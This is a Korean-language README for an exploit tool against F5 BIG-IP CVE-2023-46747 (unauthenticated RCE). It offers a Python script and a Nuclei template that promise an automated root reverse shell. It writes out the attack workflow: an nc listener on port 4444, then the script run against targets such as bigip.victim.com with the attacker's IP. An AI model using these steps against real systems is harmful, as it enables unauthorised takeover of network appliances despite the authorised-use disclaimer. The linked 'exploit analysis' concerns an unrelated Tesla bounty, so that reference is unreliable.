
#F5-BIG-IP-CVE-2023-46747-Exploit – 인증되지 않은 RCE Python 익스플로잇 & Nuclei 템플릿 (Raguraman 제작) ✓ 자동화된 TCP 리버스 셸 (LHOST/LPORT) ✓ 영향받는 BIG-IP 13.x–17.x에서 테스트됨 ⚠️ 승인된 침투 테스트에만 사용
Python3 및 Nuclei 버전 – raguraman 제작
치명적인 인증 없는 RCE(CVSS 9.8) - AJP + HTTP 요청 스머글링을 통한 공격
패치되지 않은 모든 BIG-IP 13.x → 17.x(최신 17.1.0.3 포함)에서 동작
패치: https://my.f5.com/manage/s/article/K000137353 (2023년 11월)
실제 익스플로잇 분석 글: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → 독립형 Python3 (권장)CVE-2023-46747-revshell.yaml → Nuclei 템플릿 (선택 사항)# 1. Start your listener
nc -lvnp 4444
# 2. Run the exploit (works with IP or domain)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444
# → Instant root shell!
사용법 – Nuclei 템플릿 (대안) Bash # 1. YAML 파일 내부의 LHOST 및 LPORT를 편집하세요
nc -lvnp 4444
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
이 도구는 승인된 보안 테스트 용도로만 제공됩니다. 예:
승인된 침투 테스트 계약
서면 허가를 받은 레드 팀 운영
통제된 실험실 환경에서의 연구
소유하지 않았거나 테스트에 대한 명시적 허가가 없는 시스템에서 이 익스플로잇을 사용하지 마십시오. 무단 악용은 불법이며 형사 기소로 이어질 수 있습니다.
이 도구를 사용함으로써 귀하는 관련 법률 준수에 대한 모든 책임을 수락합니다. 저자는 어떠한 오용이나 손해에 대해서도 책임을 지지 않습니다.